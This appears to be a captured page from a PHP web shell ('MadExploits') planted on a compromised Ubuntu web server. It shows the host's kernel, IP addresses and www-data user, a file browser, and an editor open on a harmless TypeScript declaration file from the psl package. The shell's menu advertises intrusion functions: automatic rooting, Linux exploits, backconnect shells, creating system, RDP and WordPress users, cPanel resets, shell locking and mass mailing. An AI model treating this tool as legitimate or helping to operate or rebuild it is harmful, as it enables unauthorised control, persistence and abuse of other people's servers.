Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
psl /
types /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.48
KB
-rw-rw-rw-
test.ts
348
B
-rw-rw-rw-
tsconfig.json
399
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// TypeScript Version: 2.4 /** * Result returned when a given domain name was not parsable (not exported) */ export type ErrorResult<T extends keyof errorCodes> = { input: string; error: { code: T; message: errorCodes[T]; }; } /** * Error codes and descriptions for domain name parsing errors */ export const enum errorCodes { DOMAIN_TOO_SHORT = 'Domain name too short', DOMAIN_TOO_LONG = 'Domain name too long. It should be no more than 255 chars.', LABEL_STARTS_WITH_DASH = 'Domain name label can not start with a dash.', LABEL_ENDS_WITH_DASH = 'Domain name label can not end with a dash.', LABEL_TOO_LONG = 'Domain name label should be at most 63 chars long.', LABEL_TOO_SHORT = 'Domain name label should be at least 1 character long.', LABEL_INVALID_CHARS = 'Domain name label can only contain alphanumeric characters or dashes.' } // Export the browser global variable name additionally to the CJS/AMD exports below export as namespace psl; export type ParsedDomain = { input: string; tld: string | null; sld: string | null; domain: string | null; subdomain: string | null; listed: boolean; } /** * Parse a domain name and return its components */ export function parse(input: string): ParsedDomain | ErrorResult<keyof errorCodes>; /** * Get the base domain for full domain name */ export function get(domain: string): string | null; /** * Check whether the given domain belongs to a known public suffix */ export function isValid(domain: string): boolean;
Close